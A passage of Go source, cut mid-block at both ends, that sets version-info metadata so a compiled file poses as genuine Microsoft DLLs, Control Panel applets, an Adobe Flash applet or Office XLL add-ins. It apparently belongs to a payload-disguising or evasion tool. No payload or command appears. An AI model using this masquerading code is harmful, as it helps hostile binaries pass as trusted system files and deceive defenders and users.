vi.FixedFileInfo.FileVersion.Major = 10 526 | vi.FixedFileInfo.FileVersion.Minor = 0 527 | vi.FixedFileInfo.FileVersion.Patch = 18362 528 | vi.FixedFileInfo.FileVersion.Build = 387 529 | vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll" 530 | } 531 | if name == "combase" { 532 | vi.StringFileInfo.InternalName = "COMBASE.DLL" 533 | vi.StringFileInfo.FileDescription = "Microsoft COM for Windows" 534 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 535 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 536 | vi.StringFileInfo.LegalTrademarks = "" 537 | vi.FixedFileInfo.ProductVersion.Patch = 18362 538 | vi.FixedFileInfo.ProductVersion.Major = 10 539 | vi.FixedFileInfo.ProductVersion.Minor = 0 540 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 541 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 542 | vi.FixedFileInfo.FileVersion.Major = 10 543 | vi.FixedFileInfo.FileVersion.Minor = 0 544 | vi.FixedFileInfo.FileVersion.Patch = 18362 545 | vi.FixedFileInfo.FileVersion.Build = 1 546 | vi.StringFileInfo.OriginalFilename = "COMBASE.DLL" 547 | } 548 | if name == "cryptsp" { 549 | vi.StringFileInfo.InternalName = "cryptsp.dll" 550 | vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API" 551 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 552 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 553 | vi.StringFileInfo.LegalTrademarks = "" 554 | vi.FixedFileInfo.ProductVersion.Patch = 18362 555 | vi.FixedFileInfo.ProductVersion.Major = 10 556 | vi.FixedFileInfo.ProductVersion.Minor = 0 557 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 558 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 559 | vi.FixedFileInfo.FileVersion.Major = 10 560 | vi.FixedFileInfo.FileVersion.Minor = 0 561 | vi.FixedFileInfo.FileVersion.Patch = 18362 562 | vi.FixedFileInfo.FileVersion.Build = 1 563 | vi.StringFileInfo.OriginalFilename = "cryptsp.dll" 564 | } 565 | if name == "dnsapi" { 566 | vi.StringFileInfo.InternalName = "dnsapi" 567 | vi.StringFileInfo.FileDescription = "DNS Client API DLL" 568 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 569 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 570 | vi.StringFileInfo.LegalTrademarks = "" 571 | vi.FixedFileInfo.ProductVersion.Patch = 18362 572 | vi.FixedFileInfo.ProductVersion.Major = 10 573 | vi.FixedFileInfo.ProductVersion.Minor = 0 574 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 575 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 576 | vi.FixedFileInfo.FileVersion.Major = 10 577 | vi.FixedFileInfo.FileVersion.Minor = 0 578 | vi.FixedFileInfo.FileVersion.Patch = 18362 579 | vi.FixedFileInfo.FileVersion.Build = 1 580 | vi.StringFileInfo.OriginalFilename = "dnsapi" 581 | } 582 | if name == "dpapi" { 583 | vi.StringFileInfo.InternalName = "dpapi.dll" 584 | vi.StringFileInfo.FileDescription = "Data Protection API" 585 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 586 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 587 | vi.StringFileInfo.LegalTrademarks = "" 588 | vi.FixedFileInfo.ProductVersion.Patch = 18362 589 | vi.FixedFileInfo.ProductVersion.Major = 10 590 | vi.FixedFileInfo.ProductVersion.Minor = 0 591 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 592 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 593 | vi.FixedFileInfo.FileVersion.Major = 10 594 | vi.FixedFileInfo.FileVersion.Minor = 0 595 | vi.FixedFileInfo.FileVersion.Patch = 18362 596 | vi.FixedFileInfo.FileVersion.Build = 1 597 | vi.StringFileInfo.OriginalFilename = "dpapi.dll" 598 | } 599 | if name == "sechost" { 600 | vi.StringFileInfo.InternalName = "sechost.dll" 601 | vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs" 602 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 603 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 604 | vi.StringFileInfo.LegalTrademarks = "" 605 | vi.FixedFileInfo.ProductVersion.Patch = 18362 606 | vi.FixedFileInfo.ProductVersion.Major = 10 607 | vi.FixedFileInfo.ProductVersion.Minor = 0 608 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 609 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 610 | vi.FixedFileInfo.FileVersion.Major = 10 611 | vi.FixedFileInfo.FileVersion.Minor = 0 612 | vi.FixedFileInfo.FileVersion.Patch = 18362 613 | vi.FixedFileInfo.FileVersion.Build = 1 614 | vi.StringFileInfo.OriginalFilename = "sechost.dll" 615 | } 616 | if name == "schannel" { 617 | vi.StringFileInfo.InternalName = "schannel.dll" 618 | vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider" 619 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 620 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 621 | vi.StringFileInfo.LegalTrademarks = "" 622 | vi.FixedFileInfo.ProductVersion.Patch = 18362 623 | vi.FixedFileInfo.ProductVersion.Major = 10 624 | vi.FixedFileInfo.ProductVersion.Minor = 0 625 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 626 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 627 | vi.FixedFileInfo.FileVersion.Major = 10 628 | vi.FixedFileInfo.FileVersion.Minor = 0 629 | vi.FixedFileInfo.FileVersion.Patch = 18362 630 | vi.FixedFileInfo.FileVersion.Build = 1 631 | vi.StringFileInfo.OriginalFilename = "schannel.dll" 632 | } 633 | if name == "urlmon" { 634 | vi.StringFileInfo.InternalName = "UrlMon.dll" 635 | vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32" 636 | vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)" 637 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 638 | vi.StringFileInfo.LegalTrademarks = "" 639 | vi.FixedFileInfo.ProductVersion.Patch = 18362 640 | vi.FixedFileInfo.ProductVersion.Major = 11 641 | vi.FixedFileInfo.ProductVersion.Minor = 0 642 | vi.StringFileInfo.ProductName = "Internet Explorer" 643 | vi.StringFileInfo.ProductVersion = "11.00.18362.1" 644 | vi.FixedFileInfo.FileVersion.Major = 10 645 | vi.FixedFileInfo.FileVersion.Minor = 0 646 | vi.FixedFileInfo.FileVersion.Patch = 18362 647 | vi.FixedFileInfo.FileVersion.Build = 1 648 | vi.StringFileInfo.OriginalFilename = "UrlMon.dll" 649 | } 650 | if name == "win32u" { 651 | vi.StringFileInfo.InternalName = "Win32u" 652 | vi.StringFileInfo.FileDescription = "Win32u" 653 | vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)" 654 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 655 | vi.StringFileInfo.LegalTrademarks = "" 656 | vi.FixedFileInfo.ProductVersion.Patch = 18362 657 | vi.FixedFileInfo.ProductVersion.Major = 10 658 | vi.FixedFileInfo.ProductVersion.Minor = 0 659 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 660 | vi.StringFileInfo.ProductVersion = "10.0.18362.900" 661 | vi.FixedFileInfo.FileVersion.Major = 10 662 | vi.FixedFileInfo.FileVersion.Minor = 0 663 | vi.FixedFileInfo.FileVersion.Patch = 18362 664 | vi.FixedFileInfo.FileVersion.Build = 1 665 | vi.StringFileInfo.OriginalFilename = "Win32u" 666 | } 667 | if name == "appwizard" { 668 | vi.StringFileInfo.InternalName = "appwiz.cpl" 669 | vi.StringFileInfo.FileDescription = "Shell Application Manager" 670 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 671 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 672 | vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI" 673 | vi.FixedFileInfo.ProductVersion.Patch = 18362 674 | vi.FixedFileInfo.ProductVersion.Major = 10 675 | vi.FixedFileInfo.ProductVersion.Minor = 0 676 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 677 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 678 | vi.FixedFileInfo.FileVersion.Major = 10 679 | vi.FixedFileInfo.FileVersion.Minor = 0 680 | vi.FixedFileInfo.FileVersion.Patch = 18362 681 | vi.FixedFileInfo.FileVersion.Build = 1 682 | vi.StringFileInfo.InternalName = "appwiz.cpl" 683 | } 684 | if name == "bthprop" { 685 | vi.StringFileInfo.InternalName = "bthprops.cpl" 686 | vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet" 687 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 688 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 689 | vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui" 690 | vi.FixedFileInfo.ProductVersion.Patch = 18362 691 | vi.FixedFileInfo.ProductVersion.Major = 10 692 | vi.FixedFileInfo.ProductVersion.Minor = 0 693 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 694 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 695 | vi.FixedFileInfo.FileVersion.Major = 10 696 | vi.FixedFileInfo.FileVersion.Minor = 0 697 | vi.FixedFileInfo.FileVersion.Patch = 18362 698 | vi.FixedFileInfo.FileVersion.Build = 1 699 | vi.StringFileInfo.InternalName = "bthprops.cpl" 700 | } 701 | if name == "desktop" { 702 | vi.StringFileInfo.InternalName = "desk.cpl" 703 | vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel" 704 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 705 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 706 | vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI" 707 | vi.FixedFileInfo.ProductVersion.Patch = 18362 708 | vi.FixedFileInfo.ProductVersion.Major = 10 709 | vi.FixedFileInfo.ProductVersion.Minor = 0 710 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 711 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 712 | vi.FixedFileInfo.FileVersion.Major = 10 713 | vi.FixedFileInfo.FileVersion.Minor = 0 714 | vi.FixedFileInfo.FileVersion.Patch = 18362 715 | vi.FixedFileInfo.FileVersion.Build = 1 716 | vi.StringFileInfo.InternalName = "DESK" 717 | 718 | } 719 | if name == "netfirewall" { 720 | vi.StringFileInfo.InternalName = "Firewall.cpl" 721 | vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub" 722 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 723 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 724 | vi.StringFileInfo.OriginalFilename = "Firewall.cpl" 725 | vi.FixedFileInfo.ProductVersion.Patch = 18362 726 | vi.FixedFileInfo.ProductVersion.Major = 10 727 | vi.FixedFileInfo.ProductVersion.Minor = 0 728 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 729 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 730 | vi.FixedFileInfo.FileVersion.Major = 10 731 | vi.FixedFileInfo.FileVersion.Minor = 0 732 | vi.FixedFileInfo.FileVersion.Patch = 18362 733 | vi.FixedFileInfo.FileVersion.Build = 1 734 | vi.StringFileInfo.InternalName = "Firewall.cpl" 735 | } 736 | if name == "FlashPlayer" { 737 | vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0" 738 | vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet" 739 | vi.StringFileInfo.FileVersion = "32.0.0.255" 740 | vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries." 741 | vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl" 742 | vi.FixedFileInfo.ProductVersion.Patch = 0 743 | vi.FixedFileInfo.ProductVersion.Major = 32 744 | vi.FixedFileInfo.ProductVersion.Minor = 0 745 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 746 | vi.StringFileInfo.ProductVersion = "32.0.0.255" 747 | vi.FixedFileInfo.FileVersion.Major = 32 748 | vi.FixedFileInfo.FileVersion.Minor = 0 749 | vi.FixedFileInfo.FileVersion.Patch = 0 750 | vi.FixedFileInfo.FileVersion.Build = 255 751 | vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl" 752 | } 753 | if name == "hardwarewiz" { 754 | vi.StringFileInfo.InternalName = "hdwwiz.cpl" 755 | vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet" 756 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 757 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 758 | vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui" 759 | vi.FixedFileInfo.ProductVersion.Patch = 18362 760 | vi.FixedFileInfo.ProductVersion.Major = 10 761 | vi.FixedFileInfo.ProductVersion.Minor = 0 762 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 763 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 764 | vi.FixedFileInfo.FileVersion.Major = 10 765 | vi.FixedFileInfo.FileVersion.Minor = 0 766 | vi.FixedFileInfo.FileVersion.Patch = 18362 767 | vi.FixedFileInfo.FileVersion.Build = 1 768 | vi.StringFileInfo.InternalName = "hdwwiz" 769 | } 770 | if name == "inet" { 771 | vi.StringFileInfo.InternalName = "inetcpl.cpl" 772 | vi.StringFileInfo.FileDescription = "Internet Control Panel" 773 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 774 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 775 | vi.StringFileInfo.OriginalFilename = "" 776 | vi.FixedFileInfo.ProductVersion.Patch = 18362 777 | vi.FixedFileInfo.ProductVersion.Major = 10 778 | vi.FixedFileInfo.ProductVersion.Minor = 0 779 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 780 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 781 | vi.FixedFileInfo.FileVersion.Major = 10 782 | vi.FixedFileInfo.FileVersion.Minor = 0 783 | vi.FixedFileInfo.FileVersion.Patch = 18362 784 | vi.FixedFileInfo.FileVersion.Build = 1 785 | vi.StringFileInfo.InternalName = "inetcpl.cpl" 786 | } 787 | if name == "control" { 788 | vi.StringFileInfo.InternalName = "intl.cpl" 789 | vi.StringFileInfo.FileDescription = "Control Panel DLL" 790 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 791 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 792 | vi.StringFileInfo.OriginalFilename = "" 793 | vi.FixedFileInfo.ProductVersion.Patch = 18362 794 | vi.FixedFileInfo.ProductVersion.Major = 10 795 | vi.FixedFileInfo.ProductVersion.Minor = 0 796 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 797 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 798 | vi.FixedFileInfo.FileVersion.Major = 10 799 | vi.FixedFileInfo.FileVersion.Minor = 0 800 | vi.FixedFileInfo.FileVersion.Patch = 18362 801 | vi.FixedFileInfo.FileVersion.Build = 1 802 | vi.StringFileInfo.InternalName = "CONTROL" 803 | } 804 | if name == "irprop" { 805 | vi.StringFileInfo.InternalName = "irprops.cpl" 806 | vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet" 807 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 808 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 809 | vi.StringFileInfo.OriginalFilename = "irprops.cpl" 810 | vi.FixedFileInfo.ProductVersion.Patch = 18362 811 | vi.FixedFileInfo.ProductVersion.Major = 10 812 | vi.FixedFileInfo.ProductVersion.Minor = 0 813 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 814 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 815 | vi.FixedFileInfo.FileVersion.Major = 10 816 | vi.FixedFileInfo.FileVersion.Minor = 0 817 | vi.FixedFileInfo.FileVersion.Patch = 18362 818 | vi.FixedFileInfo.FileVersion.Build = 1 819 | vi.StringFileInfo.InternalName = "Infrared Properties" 820 | } 821 | if name == "Game" { 822 | vi.StringFileInfo.InternalName = "joy.cpl" 823 | vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet" 824 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 825 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 826 | vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI" 827 | vi.FixedFileInfo.ProductVersion.Patch = 18362 828 | vi.FixedFileInfo.ProductVersion.Major = 10 829 | vi.FixedFileInfo.ProductVersion.Minor = 0 830 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 831 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 832 | vi.FixedFileInfo.FileVersion.Major = 10 833 | vi.FixedFileInfo.FileVersion.Minor = 0 834 | vi.FixedFileInfo.FileVersion.Patch = 18362 835 | vi.FixedFileInfo.FileVersion.Build = 1 836 | vi.StringFileInfo.InternalName = "JOY.CPL" 837 | } 838 | if name == "inputs" { 839 | vi.StringFileInfo.InternalName = "main.cpl" 840 | vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets" 841 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 842 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 843 | vi.StringFileInfo.OriginalFilename = "main.cpl.mui" 844 | vi.FixedFileInfo.ProductVersion.Patch = 18362 845 | vi.FixedFileInfo.ProductVersion.Major = 10 846 | vi.FixedFileInfo.ProductVersion.Minor = 0 847 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 848 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 849 | vi.FixedFileInfo.FileVersion.Major = 10 850 | vi.FixedFileInfo.FileVersion.Minor = 0 851 | vi.FixedFileInfo.FileVersion.Patch = 18362 852 | vi.FixedFileInfo.FileVersion.Build = 1 853 | vi.StringFileInfo.InternalName = "main.cpl" 854 | 855 | } 856 | if name == "mimosys" { 857 | vi.StringFileInfo.InternalName = "mmsys.dll" 858 | vi.StringFileInfo.FileDescription = "Audio Control Panel" 859 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 860 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 861 | vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui" 862 | vi.FixedFileInfo.ProductVersion.Patch = 18362 863 | vi.FixedFileInfo.ProductVersion.Major = 10 864 | vi.FixedFileInfo.ProductVersion.Minor = 0 865 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 866 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 867 | vi.FixedFileInfo.FileVersion.Major = 10 868 | vi.FixedFileInfo.FileVersion.Minor = 0 869 | vi.FixedFileInfo.FileVersion.Patch = 18362 870 | vi.FixedFileInfo.FileVersion.Build = 1 871 | vi.StringFileInfo.InternalName = "mmsys.cpl" 872 | } 873 | if name == "ncp" { 874 | vi.StringFileInfo.InternalName = "ncpa.cpl" 875 | vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub" 876 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 877 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 878 | vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui" 879 | vi.FixedFileInfo.ProductVersion.Patch = 18362 880 | vi.FixedFileInfo.ProductVersion.Major = 10 881 | vi.FixedFileInfo.ProductVersion.Minor = 0 882 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 883 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 884 | vi.FixedFileInfo.FileVersion.Major = 10 885 | vi.FixedFileInfo.FileVersion.Minor = 0 886 | vi.FixedFileInfo.FileVersion.Patch = 18362 887 | vi.FixedFileInfo.FileVersion.Build = 1 888 | vi.StringFileInfo.InternalName = "ncpa.cpl" 889 | } 890 | if name == "power" { 891 | vi.StringFileInfo.InternalName = "powercfg.cpl" 892 | vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet" 893 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 894 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 895 | vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI" 896 | vi.FixedFileInfo.ProductVersion.Patch = 18362 897 | vi.FixedFileInfo.ProductVersion.Major = 10 898 | vi.FixedFileInfo.ProductVersion.Minor = 0 899 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 900 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 901 | vi.FixedFileInfo.FileVersion.Major = 10 902 | vi.FixedFileInfo.FileVersion.Minor = 0 903 | vi.FixedFileInfo.FileVersion.Patch = 18362 904 | vi.FixedFileInfo.FileVersion.Build = 1 905 | vi.StringFileInfo.InternalName = "powercfg.cpl" 906 | } 907 | if name == "speech" { 908 | vi.StringFileInfo.InternalName = "sapi.cpl" 909 | vi.StringFileInfo.FileDescription = "Speech UX Control Panel" 910 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 911 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 912 | vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui" 913 | vi.FixedFileInfo.ProductVersion.Patch = 18362 914 | vi.FixedFileInfo.ProductVersion.Major = 10 915 | vi.FixedFileInfo.ProductVersion.Minor = 0 916 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 917 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 918 | vi.FixedFileInfo.FileVersion.Major = 10 919 | vi.FixedFileInfo.FileVersion.Minor = 0 920 | vi.FixedFileInfo.FileVersion.Patch = 18362 921 | vi.FixedFileInfo.FileVersion.Build = 1 922 | vi.StringFileInfo.InternalName = "sapi.cpl" 923 | } 924 | 925 | if name == "system" { 926 | vi.StringFileInfo.InternalName = "sysdm.cpl" 927 | vi.StringFileInfo.FileDescription = "System Applet for the Control Panel" 928 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 929 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 930 | vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui" 931 | vi.FixedFileInfo.ProductVersion.Patch = 18362 932 | vi.FixedFileInfo.ProductVersion.Major = 10 933 | vi.FixedFileInfo.ProductVersion.Minor = 0 934 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 935 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 936 | vi.FixedFileInfo.FileVersion.Major = 10 937 | vi.FixedFileInfo.FileVersion.Minor = 0 938 | vi.FixedFileInfo.FileVersion.Patch = 18362 939 | vi.FixedFileInfo.FileVersion.Build = 1 940 | vi.StringFileInfo.InternalName = "sysdm.cpl" 941 | } 942 | if name == "Tablet" { 943 | vi.StringFileInfo.InternalName = "TabletPC.cpl" 944 | vi.StringFileInfo.FileDescription = "Tablet PC Control Panel" 945 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 946 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 947 | vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui" 948 | vi.FixedFileInfo.ProductVersion.Patch = 18362 949 | vi.FixedFileInfo.ProductVersion.Major = 10 950 | vi.FixedFileInfo.ProductVersion.Minor = 0 951 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 952 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 953 | vi.FixedFileInfo.FileVersion.Major = 10 954 | vi.FixedFileInfo.FileVersion.Minor = 0 955 | vi.FixedFileInfo.FileVersion.Patch = 18362 956 | vi.FixedFileInfo.FileVersion.Build = 1 957 | vi.StringFileInfo.InternalName = "TabletPC.cpl" 958 | } 959 | if name == "telephone" { 960 | vi.StringFileInfo.InternalName = "telephon.cpl" 961 | vi.StringFileInfo.FileDescription = "Telephony Control Panel" 962 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 963 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 964 | vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui" 965 | vi.FixedFileInfo.ProductVersion.Patch = 18362 966 | vi.FixedFileInfo.ProductVersion.Major = 10 967 | vi.FixedFileInfo.ProductVersion.Minor = 0 968 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 969 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 970 | vi.FixedFileInfo.FileVersion.Major = 10 971 | vi.FixedFileInfo.FileVersion.Minor = 0 972 | vi.FixedFileInfo.FileVersion.Patch = 18362 973 | vi.FixedFileInfo.FileVersion.Build = 1 974 | vi.StringFileInfo.InternalName = "telephon.cpl" 975 | } 976 | if name == "datetime" { 977 | vi.StringFileInfo.InternalName = "timedate.cpl" 978 | vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet" 979 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 980 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 981 | vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui" 982 | vi.FixedFileInfo.ProductVersion.Patch = 18362 983 | vi.FixedFileInfo.ProductVersion.Major = 10 984 | vi.FixedFileInfo.ProductVersion.Minor = 0 985 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 986 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 987 | vi.FixedFileInfo.FileVersion.Major = 10 988 | vi.FixedFileInfo.FileVersion.Minor = 0 989 | vi.FixedFileInfo.FileVersion.Patch = 18362 990 | vi.FixedFileInfo.FileVersion.Build = 1 991 | vi.StringFileInfo.InternalName = "timedate.cpl" 992 | } 993 | if name == "winsec" { 994 | vi.StringFileInfo.InternalName = "wscui.cpl" 995 | vi.StringFileInfo.FileDescription = "Security and Maintenance" 996 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 997 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 998 | vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui" 999 | vi.FixedFileInfo.ProductVersion.Patch = 18362 1000 | vi.FixedFileInfo.ProductVersion.Major = 10 1001 | vi.FixedFileInfo.ProductVersion.Minor = 0 1002 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 1003 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 1004 | vi.FixedFileInfo.FileVersion.Major = 10 1005 | vi.FixedFileInfo.FileVersion.Minor = 0 1006 | vi.FixedFileInfo.FileVersion.Patch = 18362 1007 | vi.FixedFileInfo.FileVersion.Build = 1 1008 | vi.StringFileInfo.InternalName = "wscui.cpl" 1009 | } 1010 | if name == "Timesheet" { 1011 | vi.StringFileInfo.InternalName = "Timesheet.xll " 1012 | vi.StringFileInfo.FileDescription = "Timesheet ToolPak" 1013 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1014 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1015 | vi.StringFileInfo.OriginalFilename = "Timesheet.xll" 1016 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1017 | vi.FixedFileInfo.ProductVersion.Major = 16 1018 | vi.FixedFileInfo.ProductVersion.Minor = 0 1019 | vi.StringFileInfo.ProductName = "Microsoft Office" 1020 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1021 | vi.FixedFileInfo.FileVersion.Major = 16 1022 | vi.FixedFileInfo.FileVersion.Minor = 0 1023 | vi.FixedFileInfo.FileVersion.Patch = 10001 1024 | vi.FixedFileInfo.FileVersion.Build = 10000 1025 | vi.StringFileInfo.InternalName = "Timesheet.xll" 1026 | } 1027 | if name == "Reports" { 1028 | vi.StringFileInfo.InternalName = "Reports.xll " 1029 | vi.StringFileInfo.FileDescription = "Report ToolPak" 1030 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1031 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1032 | vi.StringFileInfo.OriginalFilename = "Reports.xll" 1033 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1034 | vi.FixedFileInfo.ProductVersion.Major = 16 1035 | vi.FixedFileInfo.ProductVersion.Minor = 0 1036 | vi.StringFileInfo.ProductName = "Microsoft Office" 1037 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1038 | 